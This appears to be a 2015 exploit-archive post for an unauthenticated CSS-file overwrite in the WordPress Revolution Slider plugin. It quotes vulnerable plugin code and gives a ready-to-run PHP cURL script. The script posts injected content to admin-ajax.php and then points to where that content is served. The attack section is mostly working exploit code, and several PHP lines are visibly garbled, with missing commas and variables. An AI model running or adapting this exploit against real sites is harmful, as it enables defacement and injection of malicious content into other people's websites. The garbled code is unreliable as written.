facebook facebook twitter rss

Wordpress Plugin Revolution Slider - Unrestricted File Upload

Author: CrashBandicot , Published: 28-03-2015
######################################################################
# Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
# Google Dork: Y0ur Brain
# Date: 27.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://revolution.themepunch.com/
# Version: old
# Tested on: Windows
######################################################################


# Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Vulnerable File : revslider_admin.php

232. $action = self::getPostGetVar("client_action");
233. $data = self::getPostGetVar("data");
...
301. case "get_captions_css":
302. $contentCSS = $operations->getCaptionsContent();
303. self::ajaxResponseData($contentCSS);
...
305. case "update_captions_css":
306. $arrCaptions = $operations->updateCaptionsContentData($data);
307. self::ajaxResponseSuccess("CSS file saved succesfully!",array("arrCaptions"=>$arrCaptions));


# Exploit :

<?php

$post 
= array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<marquee>Malicious Code Here</marquee>"
);
 
$ch curl_init ("http://localhost/wp-admin/admin-ajax.php");
curl_setopt ($chCURLOPT_RETURNTRANSFER1);
curl_setopt ($chCURLOPT_FOLLOWLOCATION1);
curl_setopt ($chCURLOPT_USERAGENT"Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($chCURLOPT_CONNECTTIMEOUT5);
curl_setopt ($chCURLOPT_SSL_VERIFYPEER0);
curl_setopt ($chCURLOPT_SSL_VERIFYHOST0);
curl_setopt ($chCURLOPT_POST1);
curl_setopt ($chCURLOPT_POSTFIELDS$post);
$data curl_exec ($ch);
curl_close ($ch);

?>



# Path of Result : /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

#EOF

Like us on Facebook :